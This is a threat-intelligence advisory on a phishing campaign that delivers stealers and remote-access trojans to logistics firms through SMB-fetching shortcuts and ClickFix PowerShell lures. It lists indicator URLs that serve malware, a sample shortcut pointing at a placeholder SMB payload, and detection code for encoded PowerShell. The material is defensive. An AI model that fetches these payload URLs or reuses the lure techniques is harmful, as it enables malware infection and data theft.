September 25, 2024
Severity
High
Analysis Summary
A recent phishing campaign targeting transportation and logistics organizations in North America aims to infect them with various remote access trojans (RATs) and information stealers.
According to the researchers, the activity cluster inserts malicious content into ongoing email exchanges by using legitimate email accounts that have been hijacked and belong to shipping and transportation organizations. It has been determined that the campaign involved the use of up to 15 compromised email accounts. Currently, neither the method nor the identity of the threat actors behind these attacks is known.
From May to July 2024, most of the activity delivered Lumma Stealer, StealC, or NetSupport. In August 2024 the threat actor changed its strategy, using new infrastructure, a different delivery method, and additional payloads to distribute Arechclient2 and DanaBot. The attack chains send messages carrying either a Google Drive link that leads to an internet shortcut (.URL) file or a .URL file attached directly; when the shortcut is opened, it uses Server Message Block (SMB) to download the next-stage payload, which contains the malware, from a remote location.
Some campaign variants observed in August 2024 have also adopted the newly popular ClickFix technique, which tricks victims into installing DanaBot by pretending to fix a problem with how document content renders in the web browser. The lure instructs the victim to copy a Base64-encoded PowerShell script and paste it into a terminal, which starts the infection process.
Samsara, AMB Logistic, and Astra TMS, software used only for fleet operations management and transportation, have all been impersonated in these campaigns. The threat actor most likely researches the targeted company's operations before sending a campaign, judging by the narrow targeting of specific organizations, the compromise of accounts belonging to that sector, and the use of lures that impersonate software built specifically for fleet management and freight operations.
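The two delivery mechanisms described above, a .URL shortcut that pulls its payload over SMB and a ClickFix lure that has the user paste a Base64-encoded PowerShell command, both leave artifacts a defender can inspect mechanically. The following Python is an added example, not code from the advisory or from the researchers it cites: it parses an internet shortcut and reports whether its target is a remote UNC/SMB share, and it decodes a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text) so an analyst can read what a command line from an EDR or clipboard log would run. The shortcut sample, the host 203.0.113.10 (an RFC 5737 documentation address) and the command line are constructed here; the encoded payload is a harmless Write-Host built at import time.

```python
import base64
import configparser
import re
from typing import Dict, Optional

# ---- Constructed samples (not artifacts from the advisory) -------------------
# A .URL internet shortcut is a small INI file. This one points at a UNC share on
# a placeholder host, the pattern the advisory describes for the SMB fetch.
SAMPLE_SHORTCUT = """[InternetShortcut]
URL=file://\\\\203.0.113.10\\share\\rate_confirmation.vbs
IconIndex=0
"""

# A ClickFix-style command line: PowerShell launched with an encoded command.
# The payload is benign and is encoded here so the Base64 is exact.
SAMPLE_SCRIPT = "Write-Host 'constructed sample'"
SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -w hidden -enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)


def shortcut_target(text: str) -> Optional[str]:
    """Return the URL= value of an [InternetShortcut] file, or None if absent."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return None
    return cp.get("InternetShortcut", "URL", fallback=None)


_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")
_UNC = re.compile(r"^/{2,}([^/]+)(?:/|$)")


def unc_host(target: str) -> Optional[str]:
    """Return the remote host if the target is a UNC/SMB path, else None.

    Handles file://\\\\host\\share, file:////host/share, file://host/share and a
    bare \\\\host\\share. Local drive paths and non-file schemes return None.
    """
    t = target.strip().replace("\\", "/")
    m = _SCHEME.match(t)
    if m:
        if m.group(1).lower() != "file":
            return None  # http(s), ftp, etc. are not SMB fetches
        t = t[m.end():]
    m = _UNC.match(t)
    if not m:
        return None
    host = m.group(1).lower()
    if host in ("localhost", "127.0.0.1") or re.fullmatch(r"[a-z]:", host):
        return None  # file:///C:/... is a local path, not a share
    return host


# -e, -ec, -enc, -encodedcommand ... followed by a Base64 blob; -ep (ExecutionPolicy)
# is deliberately not matched.
_ENC = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode PowerShell's -EncodedCommand (Base64 of UTF-16LE) for review."""
    m = _ENC.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def triage(shortcut_text: str, cmdline: str) -> Dict[str, Optional[str]]:
    """Summarise both checks for one message or host under review."""
    target = shortcut_target(shortcut_text)
    return {
        "shortcut_target": target,
        "smb_host": unc_host(target) if target else None,
        "decoded_powershell": decode_encoded_command(cmdline),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SHORTCUT, SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

A non-empty `smb_host` for a shortcut that arrived by email is a strong triage signal on its own, since a legitimate document link has no reason to pull content from an external share; the decoded command text is what goes into the ticket rather than the opaque Base64.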
Anger Stealer, BLX Stealer (also known as XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxy, Poseidon, PowerShell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer, and a variant of CryptBot called Yet Another Silly Stealer (YASS) are among the stealer malware strains that have surfaced recently. It also coincides with the appearance of a new RomCom RAT version, dubbed SnipBot, which is disseminated through phishing emails that contain phony links. SnipBot is the replacement for PEAPOD (also known as RomCom 4.0). The researchers first brought attention to a few campaign elements in July 2024.
The cybersecurity researchers noted that although ransomware has been deployed on RomCom-infected systems in the past, no such deployment has been seen in this activity. This suggests that Tropical Scorpius (also known as Void Rabisu), the group behind the malware, has shifted its focus from financial gain to espionage.
Impact
- Identity Theft
- Unauthorized Remote Access
- Sensitive Data Theft
Indicators of Compromise
IP
- 89.23.98.98
- 185.217.197.84
URL
- http://89.23.98.98/file/14242.exe
- http://89.23.98.98/file/ratecon.exe
- http://89.23.98.98/file/rate_confirmation.vbs
- http://89.23.98.98/file/Rateconfirm.exe
- http://89.23.98.98/file/carrier.exe
- http://185.217.197.84/file/remittance.exe
- http://185.217.197.84/file/information_package.exe
- https://live-samsaratrucking.com/true-tracking-32934.html
- http://ambcrrm.com/
- https://ambccm.com/Astra/index.html
- https://idessit.com/fn.msi
- https://ambccm.com/3.msi
- https://ambcrrm.com/3.msi
MD5
- de312520b9a2bdd14f9d1c17e3af48ac
- bba153936ae70773a3bbfab18442a6f4
- 46f9743df7663061efa5e2daf2724cca
- ddbe8350a084515886e55906a46a6647
- 792c4adf6d9e335566b886ddd936c1c2
- 141c941121cc06659813a660eddcd329
- e62a8580edcb1395fba0d845e539c47b
- dcdcea989b87f5e81a389d28628f851c
- 6bc398dba59c8d162ee858b7b199f81d
- b879d804f59086a464dc2bb22a4f5406
- 1ce8e7f90707058eec8757de0deaa76e
- 176ee400a32844237812a1cc6c77c2d3
- 7958277851b8041794467270de27091e
- acb755d083c876f6a80105c17cc61754
SHA-256
- 199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431
- ac49ff207e319f79bbd9c80d044d621920d1340f4c53e5e4da39b2a0c758634e
- e7526dadae6b589b6a31f1f7e2e528ed1c9edd9f3d1ca88f0ece0dee349d3842
- f8b12e6d02ea5914e01f95b5665b3a735acfbb9ee6ae27b004af37547bc11e7f
- 0931217eb498b677e2558fd30d92169cc824914c2df68cfbcff4f642600e2cc2
- 582c69b52d68b513f2a137bbf14704df7d787b06752333fc31066669cd663d04
- 957fe77d04e04ff69fdaff8ef60ac0de24c9eb5e6186b3187460eac6be561f5d
- 2436fe37d25712b68b2e1a9805825bcf5073efb91588c1b5193ba446d1edd319
- d45b6b04ac18ef566ac0ecdaf6a1f73d1c3164a845b83e0899c66c608154b93d
- fddacfe9e490250e62f7f30b944fcbe122e87547d01c4a906401049304c395f7
- 163dccdcaa7fdde864573f2aabe0b9cb3fdcdc6785f422f5c2ee71ae6c0e413a
- 37f328fc723b2ddf0e7a20b57257cdb29fe9286cb4ffeaac9253cb3b86520235
- 1a002631b9b2e685aeb51e8b6f4409daf9bc0159cfd54ef9ad3ba69d651ac2a3
- b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86
SHA-1
- 4489a6663bb96e5ff0e64993d520c93ffcf13467
- 2f5631ffc36430f9a74f013c072bbbab61eef296
- a42f532aa297448ff73b4a5568343872cda82503
- 040d7bcb15677c6c3cc95e9c765ee90bb1460c58
- 86c0f9d8bf6f06eb71ee194ef3e8ff78630e7aa7
- b44e2e4875f5488de208b7cfd6f3626ea050b8eb
- 61a029bc45f01013015e9ea30120fcf135e1c236
- d97d5c2e17bcf98075e7c9d615697727c35179fe
- 6fdb6f50f4ad693c64b72a76a970fc93916b3655
- ea1f77423706211132d148e58188823006589aa2
- d2e45018a2428d8b7729a75836499a4f55cdbcdf
- b3e13c9f47f522bfac53b5e53fa3fb3bf4729b1d
- 5c2c885a7049bd96747e20010a2fa6bcbeba5bd3
- 8ccfc2b30402e76a59ed07873b0ccf589728fd22
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.
- Ensure that all systems, software, and applications are up-to-date with the latest security patches. Regularly check for and apply updates to eliminate known vulnerabilities that attackers could exploit.
- Educate employees about phishing emails, social engineering tactics, and safe online behavior. Effective training can reduce the likelihood of users inadvertently initiating an attack.
- Regularly back up critical data and systems to offline or isolated storage. Test the backup restoration process to ensure that it is effective in case of an attack.
- Deploy strong endpoint protection solutions that include advanced threat detection, behavior monitoring, and real-time protection against malware and ransomware.
- Employ robust email filtering and anti-phishing solutions to detect and prevent malicious attachments and links from reaching user inboxes.
- Conduct regular penetration testing and security assessments to identify vulnerabilities and weaknesses in your network and systems. Address any findings promptly.
- Thoroughly assess third-party vendors and software before integrating them into your environment. Ensure they have strong security practices and adhere to cybersecurity standards.
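The second remediation item, searching your environment for the indicators above, is easy to do badly (grepping for one hash at a time, or missing a second path on a listed domain). The following Python is an added example, not part of the advisory: it loads a subset of the IP, URL and hash indicators from the lists above, derives the hosting domains from the URLs so that any other path on them is also flagged, and scans a batch of log lines for matches. The four log lines are constructed here to resemble proxy, DNS and EDR records; the hosts 10.0.0.x and 198.51.100.7 are placeholders.

```python
import re
from typing import List, Set, Tuple
from urllib.parse import urlparse

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
HASH_RE = re.compile(r"\b(?:[0-9a-f]{64}|[0-9a-f]{40}|[0-9a-f]{32})\b", re.I)
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)

# Indicators copied from the advisory's IoC lists (a subset).
IOC_IPS = {"89.23.98.98", "185.217.197.84"}
IOC_URLS = {
    "http://89.23.98.98/file/rate_confirmation.vbs",
    "http://185.217.197.84/file/remittance.exe",
    "https://live-samsaratrucking.com/true-tracking-32934.html",
    "http://ambcrrm.com/",
    "https://ambccm.com/3.msi",
    "https://ambcrrm.com/3.msi",
}
IOC_HASHES = {
    "de312520b9a2bdd14f9d1c17e3af48ac",                                  # MD5
    "4489a6663bb96e5ff0e64993d520c93ffcf13467",                          # SHA-1
    "199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431",  # SHA-256
}
# Derived: domains hosting the IoC URLs (IP-only URLs are covered by IOC_IPS).
IOC_DOMAINS = {
    h for h in (urlparse(u).hostname for u in IOC_URLS) if h and not IP_RE.fullmatch(h)
}

# Constructed log lines (not from the advisory) in proxy, DNS and EDR shapes.
SAMPLE_LOGS = [
    "2024-08-14T09:12:03Z proxy src=10.0.0.21 dst=185.217.197.84 "
    "url=http://185.217.197.84/file/remittance.exe action=allow",
    "2024-08-14T09:12:09Z dns client=10.0.0.21 query=ambcrrm.com rcode=NOERROR",
    "2024-08-14T09:13:40Z edr host=WS-LOG-07 proc=msiexec.exe "
    "file=C:\\Users\\j.doe\\Downloads\\3.msi "
    "sha256=199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431",
    "2024-08-14T09:15:00Z proxy src=10.0.0.33 dst=198.51.100.7 "
    "url=https://example.com/ action=allow",
]

Hit = Tuple[str, str]


def scan_line(line: str) -> Set[Hit]:
    """Return every (kind, indicator) pair found in one log line."""
    hits: Set[Hit] = set()
    for ip in IP_RE.findall(line):
        if ip in IOC_IPS:
            hits.add(("ip", ip))
    for url in URL_RE.findall(line):
        url = url.rstrip(".,;)\"'")  # trailing punctuation from free-text fields
        if url in IOC_URLS:
            hits.add(("url", url))
    for host in HOST_RE.findall(line):
        if host.lower() in IOC_DOMAINS:
            hits.add(("domain", host.lower()))
    for digest in HASH_RE.findall(line):
        if digest.lower() in IOC_HASHES:
            hits.add(("hash", digest.lower()))
    return hits


def hunt(lines: List[str]) -> List[Tuple[int, List[Hit]]]:
    """Return (line index, sorted hits) for every line that matched an indicator."""
    results = []
    for i, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            results.append((i, sorted(hits)))
    return results


if __name__ == "__main__":
    for index, hits in hunt(SAMPLE_LOGS):
        print(index, SAMPLE_LOGS[index])
        for kind, value in hits:
            print(f"    {kind}: {value}")
```

Matching on the derived domain set is what catches the DNS query for ambcrrm.com in the second line even though no listed URL appears there; hash matching is case-insensitive because EDR products are inconsistent about casing hex digests.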